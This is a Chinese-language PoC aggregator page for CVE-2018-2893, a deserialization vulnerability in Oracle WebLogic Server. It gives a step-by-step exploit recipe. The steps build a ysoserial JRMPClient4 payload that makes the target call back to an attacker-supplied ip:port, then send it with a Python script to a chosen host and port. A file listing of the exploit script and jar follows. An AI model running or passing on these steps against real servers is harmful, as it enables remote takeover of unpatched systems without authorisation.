POC详情: 8f6f4c07046a9850d6250bce76c6036893470f20

来源
https://github.com/artofwar344/CVE-2018-2893
关联漏洞
标题: Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞 (CVE-2018-2893)
描述:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Core Components子组件存在安全漏洞。攻击者可利用该漏洞控制Oracle WebLogic Server,影响
描述
CVE-2018-2893 PoC
介绍
# CVE-2018-2893

## Step 1

`java -jar ysoserial-cve-2018-2893.jar`

```
WHY SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
     Payload     Authors   Dependencies
     -------     -------   ------------
     JRMPClient  @mbechler
     JRMPClient2 @pynerd
     JRMPClient3 @pynerd
     JRMPClient4 @pynerd
     Jdk7u21     @frohoff
```

## Step 2

`java -jar ysoserial-cve-2018-2893.jar  JRMPClient4 "<ip>:<port>" > poc4.ser`

## Step 3

`python weblogic.py <host> <port> poc4.ser`
文件快照

 [4.0K]  /data/pocs/8f6f4c07046a9850d6250bce76c6036893470f20
├── [ 539]  README.md
├── [5.3K]  weblogic.py
└── [7.0M]  ysoserial-cve-2018-2893.jar

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。